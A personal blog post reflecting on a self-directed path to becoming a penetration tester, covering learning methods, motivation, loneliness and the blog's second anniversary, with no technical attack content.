The times we live in, where yesterday’s skills are no longer today’s skills, require each of us to adapt to this changing and uncertain society where knowledge is more essential than ever.

Learning in the 21st century offers an unlimited range of possibilities thanks to the wide range of resources available on the Internet.

This observation led me to wonder about the realization of my project: to become a self-trained pentester. And to answer the questions that arose during this challenge.

Before starting my challenge it was necessary to know myself better to reach my goal. And to ask myself different questions.

1- What learner profile allows me to learn sustainably?

By taking online tests to define your learner profile.

Secondly, faced with a plethora of online documents and in order to direct my documentary research towards reliable sources, training in documentary research is essential in this project.

2- How to conduct methodical and rigorous research and document monitoring based on reliable sources?

Straightforwardly, a training like this one is essential.

Personalizing an educational program adapted to one’s needs, strengths and weaknesses have a significant influence on motivation and effectiveness.

3- How to build an individualized training program?

By applying the suggestions identified in question 1. and using the documentary research methodology to construct a curriculum adapted to the targeted profession.

During a self-training process, there may be moments of discouragement.

4-How to stay motivated during self-training?

In order to stay motivated, it is useful to divide the objective into several sub-objectives. Also, alternating between formal, informal and professional learning helps to avoid fatigue. Don’t hesitate to ask for help and exchange with your family and friends or cyber professionals. Finally, one must keep in mind the objective and the positive consequences that will result in the future.

The challenge that led me to self-training made me want to share this experience.

5- How to share your lifelong learning experience?

By documenting your approach with media supports such as a podcast blog etc.

It sometimes happens that despite all the precautions taken in the construction of the training, we lack certain skills. However, side projects can fill these gaps and open us up to other subjects.

6- How to fill in skills not acquired during self-training?

By creating sub-projects that give free rein to your imagination. Personnaly, I have created podcasts that have encouraged me to improve my communication skills.

A self-study project brings us face to face with ourselves and sometimes this situation exacerbates loneliness.

7- How to deal with loneliness during the project?

By getting involved in cybersecurity associations of your choice and by not hesitating to ask professionals for advice or opinions.

Happy birthday C.S. by G.B.

I am proud to announce that my blog is 2 years old!

To celebrate this event, I made a visual recap of my challenge to become a pentester.

To realize my project of becoming a pentester, I relied on Philipe Carré’s « Apprenance » concept.
« Apprenance » is « a lasting set of dispositions… favourable to the act of learning… in all situations: formal or informal, experiential or didactic, self-directed or not, intentional or accidental ».
Philippe Carré, 2005.

My project, involved six steps such as E-learning, CTFs, learning expeditions, internship, conferences and volunteering. In order to document my approach, I created a blog to share my experience and I also built an analysis grid of skills resulting from the whole project.

I am so happy that I achieved my goal by being hired as a pentester at Okiok but my desire to learn remains as strong as ever.

Journey to be continued…

Recommended books / Suggestions de lecture